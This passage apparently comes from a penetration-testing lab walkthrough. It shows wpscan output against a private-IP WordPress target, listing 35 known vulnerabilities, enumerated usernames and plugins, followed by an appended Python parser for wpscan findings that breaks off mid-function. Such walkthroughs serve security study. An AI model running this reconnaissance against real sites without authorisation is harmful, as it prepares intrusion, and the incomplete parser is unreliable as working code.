Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11
[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11
[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.3-4.7.4 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[+] WordPress theme in use: bhost - v1.2.9
[+] Name: bhost - v1.2.9
| Location: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.3.6
| Style URL: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/style.css
| Theme Name: BHost
| Theme URI: Author: Masum Billah
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
| Author: Masum Billah
| Author URI: http://getmasum.net/
[+] Enumerating usernames ...
[+] Identified the following 10 user/s:
+----+---------+-----------------+
| Id | Login | Name |
+----+---------+-----------------+
| 1 | john | John Smith |
| 2 | elly | Elly Jones |
| 3 | peter | Peter Parker |
| 4 | barry | Barry Atkins |
| 5 | heather | Heather Neville |
| 6 | garry | garry |
| 7 | harry | harry |
| 8 | scott | scott |
| 9 | kathy | kathy |
| 10 | tim | tim |
+----+---------+-----------------+
[+] Finished: Sun May 14 22:42:55 2017
[+] Requests Done: 50
[+] Memory used: 21.754 MB
[+] Elapsed time: 00:00:00
root@kali:~#

Running the switches for enumerating users and plugins together gave back a message stating that no plugins were found, so make sure you run them separately.

root@kali:~# wpscan --url https://192.168.1.30:12380/blogblog/ --enumerate ap
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.1.30:12380/blogblog/
[+] Started: Sun May 14 22:45:24 2017
[!] The WordPress 'https://192.168.1.30:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.30:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.30:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-includes/
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 35 vulnerabilities identified from the version number
[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: https://hackerone.com/reports/110801
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5
[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2
[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: http://avlidienbrunn.com/wp_some_loader.php
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9
[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9
[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10
[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11
[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11
[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11
[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11
[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12
[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13
[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13
[!] Title: WordPress 2.3-4.7.4 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[+] WordPress theme in use: bhost - v1.2.9
[+] Name: bhost - v1.2.9
| Location: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.3.6
| Style URL: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/style.css
| Theme Name: BHost
| Theme URI: Author: Masum Billah
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
| Author: Masum Billah
| Author URI: http://getmasum.net/
[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Enumerating all plugins (may take a while and use a lot of system resources) ...

[+] We found 4 plugins:
[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
| Latest version: 1.0 (up to date)
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
[+] Name: akismet
| Latest version: 3.3.2
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
[+] Name: shortcode-ui - v0.6.2
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] The version is out of date, the latest version is 0.7.2
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/
[+] Name: two-factor
| Latest version: 0.1-dev-20170511
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/
[+] Finished: Sun May 14 22:54:19 2017
[+] Requests Done: 67551
[+] Memory used: 151.273 MB
[+] Elapsed time: 00:08:55
root@kali:~#
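wpscan prints each finding as a flat run of `[!] Title`, `Reference` and `[i] Fixed in` lines, which is tedious to triage by hand when there are 35 of them. The Python below is an added example, not part of the original walkthrough and not wpscan's own code: it groups those lines into findings, pulls out the CVE ids, lists the findings wpscan shows no fix for, and computes the smallest upgrade that closes everything with a known fix. The embedded sample is a four-entry excerpt of the output above; treating the highest `Fixed in` value as the upgrade target is an assumption of the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Excerpt of the wpscan output above (four of the 35 findings), embedded so the
# parser runs offline. The last finding has no "Fixed in" line, as on the page.
WPSCAN_EXCERPT = """\
[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 35 vulnerabilities identified from the version number
[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5
[!] Title: WordPress 2.3-4.7.4 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
[+] WordPress theme in use: bhost - v1.2.9
"""


@dataclass
class Finding:
    title: str
    references: List[str] = field(default_factory=list)
    cves: List[str] = field(default_factory=list)
    fixed_in: Optional[str] = None


TITLE_RE = re.compile(r"^\[!\] Title: (.+)$")
REF_RE = re.compile(r"^Reference: (\S+)$")
FIXED_RE = re.compile(r"^\[i\] Fixed in: (\S+)$")
CVE_RE = re.compile(r"(CVE-\d{4}-\d{4,})")


def parse_wpscan(text: str) -> List[Finding]:
    """Group wpscan's flat Title / Reference / Fixed in lines into Finding objects."""
    findings: List[Finding] = []
    current: Optional[Finding] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = TITLE_RE.match(line)
        if m:
            current = Finding(title=m.group(1))
            findings.append(current)
            continue
        if current is None:
            continue  # banner / status lines before the first finding
        m = REF_RE.match(line)
        if m:
            current.references.append(m.group(1))
            cve = CVE_RE.search(m.group(1))
            if cve:
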